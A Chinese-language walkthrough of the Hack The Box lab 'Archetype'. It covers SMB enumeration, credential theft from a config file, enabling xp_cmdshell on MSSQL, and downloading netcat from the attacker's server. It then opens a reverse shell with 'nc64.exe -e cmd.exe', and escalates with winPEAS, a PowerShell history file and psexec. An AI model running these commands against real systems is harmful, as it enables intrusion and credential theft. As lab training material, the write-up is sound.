Hack The Box-start point-Archetype笔记

Archetype

Task1：

使用nmap扫描工具对IP进行扫描，得到开放端口及详细信息

nmap -sC -sV ip

-sV:探测开放的端口的系统/服务信息

Task2：

使用smbclient工具查看主机上可用的共享

smbclient -N -L ip

发现除了ADMIN$、C$和IPC$之外，还有一个backups，尝试空密码连接。
smbclient \\\\IP\\backups或smbclient -N \\\\IP\\backups

连接成功，则backups为非管理共享

Task3：

连接成功后输入ls命令，发现存在prod.dtsConfig文件，使用get命令下载并查看发现密码

Task4：

首先了解impacket

Impacket介绍：

Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问，以及协议实现本身的某些协议（例如SMB1-3和MSRPC）。数据包可以从头开始构建，也可以从原始数据中解析，而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具，作为在此库找到可以执行的操作的示例。

项目地址：

https://github.com/SecureAuthCorp/impacket

于是下载该项目并安装

git clone https://github.com/SecureAuthCorp/impacket.git

 

我们使用task3中的账号密码进行登陆

python3 mssqlclient.py ARCHETYPE/sql_svc@IP -windows-auth

并使用命令判断我们是否为sysadmin，返回1代表true

select is_srvrolemember('sysadmin');

Task5：

根据上方help命令结果中可以知道大概是xp_cmdshell存储过程

对xp_cmdshell是否开启做测试，发现以及被关闭了，需要重新打开

 

用sp_configure将xp_cmdshell重新启动

exec sp_configure "show advanced options",1;

reconfigure;

exec sp_configure "xp_cmdshell",1;

reconfigure;

 

成功启动

在本机作准备，开启HTTP SERVER，并使用nc等待目标机回连。
在下载的nc目录下开启http server：sudo python3 -m http.server 80

并监听1234端口。

我们要在目标主机上上传文件，但由于我们不是管理员用户，不一定有权限在当前目录上传，先查看当前目录，可以用xp_cmdshell “powershell -c pwd”命令

下载好Windows的nc后，将nc上传过去

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.15.166/nc64.exe -outfile nc64.exe"

使用nc的-e参数，连接本机的1234端口

xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; ./nc64.exe -e cmd.exe IP 1234"

并且在桌面找到user flag

 

执行net user命令发现目前用户和administrator用户不在同一组，所以需要提权

Task6：

根据task6的hint可知使用winPEAS工具

下载地址：

https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe

下载后在shell中上传到目标主机上

 

powershell -c "wget http://10.10.15.166/winPEASx64.exe -outfile winPEASx64.exe  

运行该软件进行扫描，再扫描结果中发现Current Token privileges有SeImpersonatePrivilege，容易受到 juicy potato 的攻击。首先检查可以找到凭据的两个现有文件。

 

由于这是一个普通用户帐户以及服务帐户，因此值得检查频繁访问的文件或执行的命令。在检查结果中，发现在PowerShell Settings中，有PS的历史记录文件ConsoleHost_history.txt，它相当于 Linux 系统的.bash_history。ConsoleHost_history.txt位于目录C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\。

Task7：

找到ConsoleHost_history.txt文件并查看得到administrator密码

得到admin的密码后可以用Impcaket工具包里的脚本psexec.py来横向，得到administrator的shell

进入桌面目录，看到root.txt，得到root flag